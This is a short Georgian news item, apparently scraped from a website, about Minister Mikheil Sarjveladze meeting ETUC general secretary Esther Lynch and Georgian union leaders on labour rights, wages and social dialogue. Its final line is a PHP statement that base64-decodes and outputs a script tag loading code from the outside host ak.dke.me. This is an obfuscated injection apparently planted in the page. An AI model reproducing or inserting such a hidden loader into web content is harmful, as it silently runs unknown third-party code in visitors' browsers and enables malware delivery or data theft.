celsiusi
ავერსი საქკაბელი

ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრი, მიხეილ სარჯველაძე ევროკავშირის პროფკავშირების გენერალურ მდივან ესტერ ლინჩსა და საქართველოს პროფკავშირების გაერთიანების თავმჯდომარე ირაკლი პეტრიაშვილს შეხვდა.

შეხვედრაზე, მხარეებმა, შრომის უფლებების კუთხით არსებულ მდგომარეობაზე, მინიმალურ ხელფასზე, უმუშევართა შემწეობაზე,⁠ სოციალური დიალოგისა და კოლექტიური ხელშეკრულებების კიდევ უფრო მეტად წახალისებასა და ღირსეული სამუშაო გარემოს უზრუნველყოფაზე იმსჯელეს.

ევროკავშირის პროფკავშირების გენერალური მდივანმა, მინისტრს, საკუთარი გამოცდილება გაუზიარა.მხარეებმა, არსებული საკითხების გადასაწყვეტად, სამომავლოდ, მჭიდრო და აქტიური თანამშრომლობის მზაობა გამოხატეს.

შეხვედრას საქართველოს პროფკავშირების გაერთიანების თავმჯდომარის მოადგილე თამარ სურმავა და ევროკავშირის პროფკავშირების პოლიტიკის დეპარტამენტის დირექტორი ⁠ლორენცო რეპეტი ესწრებოდნენ.

96
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");